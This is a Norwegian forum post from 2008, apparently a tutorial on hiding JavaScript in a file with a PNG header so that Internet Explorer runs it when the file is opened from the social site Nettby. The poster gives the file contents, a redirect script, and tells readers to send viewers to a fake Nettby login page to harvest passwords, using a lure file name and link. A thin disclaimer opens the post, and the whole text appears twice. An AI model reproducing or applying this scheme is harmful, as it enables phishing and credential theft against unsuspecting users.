NB:
Jeg kan ikke bli holdt ansvarlig for låste brukere,
eller hva det skulle være.
Aldri brukt dette til å stjele sensetiv informasjon selv.
Gjør det på eget ansvar.
Introduksjon:
I denne videoen på milw0rm av
PHCKSEC -http://phcksec.org/
vises det et eksempel på å legge javascript i en .png fil.
IE verfiserer ikke bildefilen før den kjører den, i motsetning til Fx.
Dvs. at vi kan legge javascript i bildefilen, og alle som åpner den i IE vil kjøre scriptet.
Ved å redirecte de som åpner filen til en falsk nettby-login, kan vi høste inn passord.
Lage bildefilen:
PNG Header Format
Se:http://mindprod.com/jgloss/png.html
Så da må vi lage en fil med fil-etternavn .png, og png header.
Lag en ny fil i feks. Notepad om du bruker Windows, og kall den
for et eller annet.png. Bruk gjerne et "lokkende" filnavn
så offeret biter lettere på.
Her er hvordan filen kan se ut:
------------------------------------------------------------
89504E470D0A1A0A
0x0000000D
0x49484452
0x0000000D
0x0000000D
<html><body><script>window.location="http://www.google.com/";</script></body></html>
------------------------------------------------------------
Hvis du laster opp filen til nettby under "Filer" og åpner den i IE, så vil du bli
videresendt til google.com som du ser.
Istedet for å sende offeret til google, sender du han/hun
selvfølgelig til den falske login siden din, hvor du snapper opp
det de prøver å logge inn med.
Uten å ha prøvd, vil jeg tro en del går på denne.
Om jeg har glemt noe, så si gjerne i fra.
edit:
Sende link til bilde, som feks:
"Sjekk dette da
http://img4.nettby.no/users/b/r/u/bruker/files/porno.png"
Jeg kan ikke bli holdt ansvarlig for låste brukere,
eller hva det skulle være.
Aldri brukt dette til å stjele sensetiv informasjon selv.
Gjør det på eget ansvar.
Introduksjon:
I denne videoen på milw0rm av
PHCKSEC -http://phcksec.org/
vises det et eksempel på å legge javascript i en .png fil.
IE verfiserer ikke bildefilen før den kjører den, i motsetning til Fx.
Dvs. at vi kan legge javascript i bildefilen, og alle som åpner den i IE vil kjøre scriptet.
Ved å redirecte de som åpner filen til en falsk nettby-login, kan vi høste inn passord.
Lage bildefilen:
PNG Header Format
Se:http://mindprod.com/jgloss/png.html
Så da må vi lage en fil med fil-etternavn .png, og png header.
Lag en ny fil i feks. Notepad om du bruker Windows, og kall den
for et eller annet.png. Bruk gjerne et "lokkende" filnavn
så offeret biter lettere på.
Her er hvordan filen kan se ut:
------------------------------------------------------------
89504E470D0A1A0A
0x0000000D
0x49484452
0x0000000D
0x0000000D
<html><body><script>window.location="http://www.google.com/";</script></body></html>
------------------------------------------------------------
Hvis du laster opp filen til nettby under "Filer" og åpner den i IE, så vil du bli
videresendt til google.com som du ser.
Istedet for å sende offeret til google, sender du han/hun
selvfølgelig til den falske login siden din, hvor du snapper opp
det de prøver å logge inn med.
Uten å ha prøvd, vil jeg tro en del går på denne.
Om jeg har glemt noe, så si gjerne i fra.
edit:
Sende link til bilde, som feks:
"Sjekk dette da
http://img4.nettby.no/users/b/r/u/bruker/files/porno.png"
Sist endret av sFilez; 7. mars 2008 kl. 21:23.
Grunn: Oppdatert tittel